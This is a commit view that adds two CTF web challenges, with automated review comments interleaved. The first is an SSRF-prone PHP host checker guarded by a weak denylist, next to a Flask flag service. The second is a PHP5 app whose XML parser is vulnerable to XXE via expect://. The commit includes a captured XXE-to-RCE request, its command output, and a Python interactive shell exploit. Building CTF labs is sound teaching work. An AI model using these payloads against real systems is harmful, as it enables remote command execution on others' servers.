1 parent
4c74887
commit 49e04c7
Showing
118 changed files
with
3,495 additions
and
0 deletions.
35 changes: 35 additions & 0 deletions
35
Challenges/Agrihack-0x08/web/final/Ethernal/docker-compose.yml
@@ -0,0 +1,35 @@ | ||
version: '3' | ||
|
||
services: | ||
|
||
agrihack: | ||
container_name: ethernal | ||
build: | ||
context: ./ethernal | ||
volumes: | ||
- ./ethernal/src:/var/www/html | ||
ports: | ||
- "15013:80" | ||
networks: | ||
internal_network: | ||
ipv4_address: 10.10.0.4 | ||
|
||
flag: | ||
container_name: ethernal_flag | ||
restart: always | ||
build: | ||
context: ./flag | ||
volumes: | ||
- ./flag/src:/app | ||
networks: | ||
internal_network: | ||
ipv4_address: 10.10.0.5 | ||
expose: | ||
- "80" | ||
|
||
networks: | ||
internal_network: | ||
driver: bridge | ||
ipam: | ||
config: | ||
- subnet: 10.10.0.0/16 |
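Review bot: The `agrihack` service bind-mounts the host checkout read-write at L41 (`- ./ethernal/src:/var/www/html`) even though its Dockerfile already COPYs the same tree into the image, so a compromise of the intentionally SSRF-prone PHP container can rewrite the challenge source on the host; mount it read-only, `- ./ethernal/src:/var/www/html:ro`, or drop the mount and rely on the image. Neither service sets `user:`, so both processes run as root inside their containers. The `flag` service carries `restart: always` (L51) while the player-facing `agrihack` service has no restart policy, which looks inverted from what a long-running CTF deployment needs.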
@@ -0,0 +1,4 @@ | ||
# cd ethernal && docker compose down | ||
# cd ../flag && docker compose down | ||
docker compose down | ||
docker ps |
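--- a/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/Dockerfile
+++ b/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/Dockerfile
@@ -0,0 +1,5 @@
+FROM php:apache
+RUN apt-get update && apt-get upgrade -y
+
+COPY src/ /var/www/html/
+EXPOSE 80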
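Review bot: `FROM php:apache` at L86 is a floating tag and the `apt-get upgrade -y` at L87 pulls whatever is current at build time, so two builds of this challenge can ship different PHP and libcurl versions, which matters for a challenge whose behaviour depends on curl's URL handling; pin the base, `FROM php:<tag>@sha256:<digest>` (placeholder), and let the base image own package updates. The same `RUN` also leaves the apt package lists in the layer; end it with `&& rm -rf /var/lib/apt/lists/*`.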
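--- a/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/src/index.php
+++ b/Challenges/Agrihack-0x08/web/final/Ethernal/ethernal/src/index.php
@@ -0,0 +1,66 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
+<link rel="stylesheet" href="style.css">
+<title>Cek Service Host</title>
+</head>
+<body>
+<div class="container mt-5">
+<h2 class="mb-4">Service Check</h2>
+
+
+<form method="post">
+<div class="form-group">
+<label for="host">Hostname atau IP Address:</label>
+<input type="text" class="form-control" id="host" name="host" required>
+</div>
+<button type="submit" name="submit" class="btn btn-primary">Cek Service</button>
+</form>
+
+<div class="mt-4">
+<?php
+$blacklist = ["10.10", "10.10.0.5", "127.0.0.1", "127.0"];
+$issafe = 1;
+
+if (isset($_POST['submit'])) {
+$host = $_POST['host'];
+foreach ($blacklist as $word) {
+if (stripos($host, $word) !== false) {
+echo "no no no...";
+$issafe = 0;
+$result = "invalid";
+break;
+} else {
+$result = checkService($host);
+}
+}
+echo '<div class="alert ' . ($result ? 'alert-success' : 'alert-danger') . '">';
+echo htmlspecialchars($result);
+echo '</div>';
+}
+?>
+
+</div>
+</div>
+
+<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
+<script src="https://cdn.jsdelivr.net/npm/@popperjs/[email protected]/dist/umd/popper.min.js"></script>
+<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
+</body>
+</html>
+
+<?php
+function checkService($host)
+{
+$ch = curl_init($host);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$result = curl_exec($ch);
+$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
+curl_close($ch);
+
+return $result;
+}
+?>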
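Review bot: The denylist loop at L133–L142 calls `checkService($host)` from its `else` branch on every non-matching entry, so a host that only matches a later entry (one containing `127.0.0.1`, say) is still fetched twice before `no no no...` is printed, and an allowed host is fetched once per list entry instead of once. Decide first and fetch once: drop the `else` at L139–L141 and add `if ($issafe) { $result = checkService($host); }` after the loop, which also gives `$issafe` a reader (it and `$statusCode` at L167 are currently written and never used). The blocked path sets `$result = "invalid"`, a truthy string, so the alert at L143 renders as `alert-success`. If this sink is not meant to stay exploitable, the defensive shape is to limit the handle with `curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS)` and to compare the resolved address against an allowlist rather than matching substrings of user input.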
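--- a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/Dockerfile
+++ b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/Dockerfile
@@ -0,0 +1,10 @@
+FROM python:3.10-slim-buster
+
+RUN groupadd -r nobody
+
+WORKDIR /app
+COPY ./src /app
+RUN pip3 install --ignore-installed -r requirements.txt
+
+USER nobody
+CMD [ "python3", "-m" , "flask", "run", "--host=0.0.0.0"]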
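Review bot: `pip3 install --ignore-installed -r requirements.txt` at L190 resolves an unpinned `flask` (the requirements.txt added in this commit holds only `flask`), so the image is not reproducible and a future Flask major release can change how the `/flag` route behaves; pin it, `flask==<version>` (placeholder), ideally with hashes. `python:3.10-slim-buster` at L182 tracks Debian buster, which no longer receives security updates, so a currently supported base tag is the better choice. The `CMD` at L194 runs the Flask development server; that is tolerable for a side container that is only `expose`d on the internal network, but a comment stating that assumption would keep someone from publishing the port later.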
Binary file added
BIN
+527 Bytes
Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/__pycache__/app.cpython-310.pyc
13 changes: 13 additions & 0 deletions
13
Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/app.py
@@ -0,0 +1,13 @@ | ||
from flask import Flask, request, render_template, redirect, url_for, render_template_string, jsonify | ||
|
||
app = Flask(__name__) | ||
|
||
@app.route('/flag', methods=['POST']) | ||
def index(): | ||
if request.form.get('flag') == 'show': | ||
return "agrihack{d6723612-b6fa-4f7f-8198-c488765dcbcd}" | ||
else: | ||
return "Invalid request" | ||
|
||
if __name__ == '__main__': | ||
app.run() |
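Review bot: The flag literal at L217 is committed in source, and the same commit adds the compiled `flag/src/__pycache__/app.cpython-310.pyc` (L198), which embeds it a second time and goes stale the moment app.py changes; read the secret at startup instead, `FLAG = os.environ.get("FLAG", "<placeholder>")` with `import os`, inject it from compose, and add `__pycache__/` to `.gitignore`. Of the names imported at L208 only `Flask` and `request` are used. The handler is named `index` but serves `/flag`; a docstring such as `"""Return the flag to any client on the internal network that posts flag=show; no authentication beyond network isolation."""` would make the trust assumption explicit.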
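--- a/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/requirements.txt
+++ b/Challenges/Agrihack-0x08/web/final/Ethernal/flag/src/requirements.txt
@@ -0,0 +1 @@
+flask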
@@ -0,0 +1,4 @@ | ||
# cd ethernal && docker compose up -d --build | ||
# cd ../flag && docker compose up -d --build | ||
docker compose up -d --build | ||
docker ps |
@@ -0,0 +1,33 @@ | ||
FROM ubuntu:trusty | ||
|
||
ENV DEBIAN_FRONTEND noninteractive | ||
|
||
COPY flag /etc/ | ||
COPY --chown=www-data:www-data src /app/ | ||
RUN set -eux; \ | ||
apt-get update; \ | ||
apt-get install -yq \ | ||
grep \ | ||
apache2 \ | ||
libapache2-mod-php5 \ | ||
php5-gd \ | ||
php5-curl \ | ||
php-pear \ | ||
php5-dev \ | ||
libcurl4-openssl-dev \ | ||
expect-dev \ | ||
php5-sqlite \ | ||
php-apc ; \ | ||
pecl install expect; \ | ||
echo "extension=expect.so" >> /etc/php5/apache2/php.ini; \ | ||
rm -rf /var/lib/apt/lists/*; \ | ||
echo "ServerName localhost" >> /etc/apache2/apache2.conf; \ | ||
sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini; \ | ||
rm -fr /var/www/html && ln -s /app /var/www/html; \ | ||
service apache2 restart | ||
|
||
COPY httpd-foreground /usr/bin/ | ||
RUN chmod 755 /usr/bin/httpd-foreground | ||
|
||
EXPOSE 80 | ||
CMD ["/usr/bin/httpd-foreground"] |
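Review bot: `service apache2 restart` at the end of the `RUN` at L276 has no effect on the image: whatever it starts dies when the layer is committed, and the container is actually started by `httpd-foreground` through the `CMD` at L284, so under `set -eux` the line can only abort the build. `COPY flag /etc/` at L254 places the flag with default permissions next to the tree served by `www-data`; given the flag text added in this commit names the intended solve, that is presumably deliberate, but a comment on the line saying so would stop a later cleanup from "fixing" it. `ubuntu:trusty` and the PHP 5 / `expect` packages are likewise the deliberately deprecated pieces; pinning the base by digest keeps the lab reproducible as those tags drift.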
@@ -0,0 +1,33 @@ | ||
# -*- mode: ruby -*- | ||
# vi: set ft=ruby : | ||
|
||
Vagrant.configure(2) do |config| | ||
config.vm.box = "ubuntu/trusty64" | ||
config.vm.box_check_update = true | ||
|
||
#config.vm.network "forwarded_port", guest: 80, host: 8080 | ||
config.vm.network "private_network", ip: "192.168.33.10" | ||
config.vm.synced_folder "penlab", "/app" | ||
config.vm.provision "shell", inline: <<-SHELL | ||
apt-get update | ||
apt-get install -yq \ | ||
apache2 \ | ||
libapache2-mod-php5 \ | ||
php5-gd \ | ||
php5-curl \ | ||
php-pear \ | ||
php5-dev \ | ||
libcurl4-openssl-dev \ | ||
expect-dev \ | ||
php5-sqlite \ | ||
php-apc && \ | ||
pecl install expect && \ | ||
echo "extension=expect.so" >> /etc/php5/apache2/php.ini && \ | ||
rm -rf /var/lib/apt/lists/* | ||
echo "ServerName localhost" >> /etc/apache2/apache2.conf && \ | ||
sed -i "s/variables_order.*/variables_order = \"EGPCS\"/g" /etc/php5/apache2/php.ini | ||
rm -fr /var/www/html && ln -s /app /var/www/html | ||
chown www-data:www-data /app -R | ||
service apache2 restart | ||
SHELL | ||
end |
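Review bot: The inline provisioner at L302–L323 has no `set -e`, so if the apt step or `pecl install expect` at L315 fails the box still comes up and the later `sed`, `ln -s` and `chown` lines run against a half-configured VM; make `set -eux` the first line of the heredoc. The `&&` chain also ends at L317, so `echo "ServerName localhost"` at L318 and everything after it run regardless of whether the install chain succeeded. `config.vm.synced_folder "penlab", "/app"` at L301 assumes a `penlab` directory beside the Vagrantfile that this commit does not add, which is worth a comment.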
@@ -0,0 +1,4 @@ | ||
https://github.com/jbarone/xxelab | ||
https://gist.github.com/joernchen/3623896 | ||
https://airman604.medium.com/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 | ||
|
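--- a/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/request_rceeee
+++ b/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/request_rceeee
@@ -0,0 +1,27 @@
+POST /process.php HTTP/1.1
+Host: 127.0.0.1:5000
+Content-Length: 225
+sec-ch-ua: "Not=A?Brand";v="99", "Chromium";v="118"
+sec-ch-ua-platform: "macOS"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
+Content-Type: text/plain;charset=UTF-8
+Accept: */*
+Origin: http://127.0.0.1:5000
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://127.0.0.1:5000/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE root [
+<!ENTITY xxe SYSTEM "expect://ls$IFS/$IFS-la">]>
+<root>
+<name>Joe</name>
+<tel>ufgh</tel>
+<email>START_&xxe;_END</email>
+<password>kjh</password>
+</root>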
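Review bot: This capture targets `127.0.0.1:5000` (L343, L351, L355) while the compose file for this challenge publishes port 15015 (L426) and the accompanying script posts to `localhost:15015` (L457); it was presumably taken against a different local run, and a README line saying which setup reproduces it would save the next maintainer a guess. For the defensive half of this lab, the body at L362–L363 is a DOCTYPE that declares an external `SYSTEM` entity, which is precisely what XML hardening refuses: parsing with external entity loading disabled (`libxml_disable_entity_loader(true)` before the parse on this PHP 5 stack, whose older libxml resolves external entities by default, as the flag text itself hints) makes `&xxe;` at L367 expand to nothing. `process.php`, the page that would carry that fix, is not part of this commit view.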
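--- a/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/response_rceee
+++ b/Challenges/Agrihack-0x08/web/final/SV-IPB/agrihack/response_rceee
@@ -0,0 +1,35 @@
+HTTP/1.1 200 OK
+Date: Thu, 02 Nov 2023 16:13:30 GMT
+Server: Apache/2.4.7 (Ubuntu)
+X-Powered-By: PHP/5.5.9-1ubuntu4.29
+Vary: Accept-Encoding
+Content-Length: 1384
+Connection: close
+Content-Type: text/html
+
+Sorry, START_total 96
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 .
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 ..
+-rwxr-xr-x 1 root root 0 Nov 2 16:05 .dockerenv
+drwxr-xr-x 4 www-data www-data 4096 Nov 2 12:21 app
+drwxr-xr-x 1 root root 4096 Nov 2 12:28 bin
+drwxr-xr-x 2 root root 4096 Apr 10 2014 boot
+drwxr-xr-x 3 root root 4096 Nov 2 12:29 build
+drwxr-xr-x 5 root root 360 Nov 2 16:05 dev
+drwxr-xr-x 1 root root 4096 Nov 2 16:05 etc
+drwxr-xr-x 2 root root 4096 Apr 10 2014 home
+drwxr-xr-x 1 root root 4096 Nov 2 12:29 lib
+drwxr-xr-x 2 root root 4096 Dec 17 2019 lib64
+drwxr-xr-x 2 root root 4096 Dec 17 2019 media
+drwxr-xr-x 2 root root 4096 Apr 10 2014 mnt
+drwxr-xr-x 2 root root 4096 Dec 17 2019 opt
+dr-xr-xr-x 223 root root 0 Nov 2 16:05 proc
+drwx------ 2 root root 4096 Dec 17 2019 root
+drwxr-xr-x 1 root root 4096 Nov 2 12:29 run
+drwxr-xr-x 1 root root 4096 Mar 25 2021 sbin
+drwxr-xr-x 2 root root 4096 Dec 17 2019 srv
+dr-xr-xr-x 13 root root 0 Nov 2 16:05 sys
+drwxrwxrwt 1 root root 4096 Nov 2 16:05 tmp
+drwxr-xr-x 1 root root 4096 Dec 17 2019 usr
+drwxr-xr-x 1 root root 4096 Nov 2 12:28 var
+_END is already registered!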
@@ -0,0 +1,8 @@ | ||
version: '3' | ||
services: | ||
app: | ||
container_name: sv-ipb | ||
build: | ||
context: . | ||
ports: | ||
- "15015:80" |
@@ -0,0 +1 @@ | ||
agrihack{d3pr3c4t3d_xml_l1b_4nd_exp3ct_wr4pp3r_mak3s_xx3_l34d_to_rce} |
@@ -0,0 +1,4 @@ | ||
#!/bin/sh | ||
set -e | ||
rm -f /run/apache2/apache2.pid | ||
exec /usr/sbin/apache2ctl -DFOREGROUND |
@@ -0,0 +1,21 @@ | ||
import re, os, requests | ||
|
||
def rce(cmd): | ||
cmd = cmd.replace(" ", "$IFS") | ||
p = f"""<?xml version="1.0" encoding="UTF-8"?> | ||
<!DOCTYPE foo [<!ENTITY rce SYSTEM "expect://{cmd}"> ]> | ||
<root><username> | ||
&rce;</username><password>asd</password></root> | ||
""" | ||
r = requests.post('http://localhost:15015/process.php', data=p) | ||
pattern = re.compile(r'Sorry,(.*? couldn\'t be registered!)', re.DOTALL) | ||
matches = re.findall(pattern, r.text)[0].replace("couldn't be registered!", "") | ||
|
||
# print(r.text) | ||
print(matches) | ||
|
||
if __name__ == "__main__": | ||
os.system('clear') | ||
while True: | ||
cmd = input('root@ardhani:~$ ') | ||
rce(cmd) |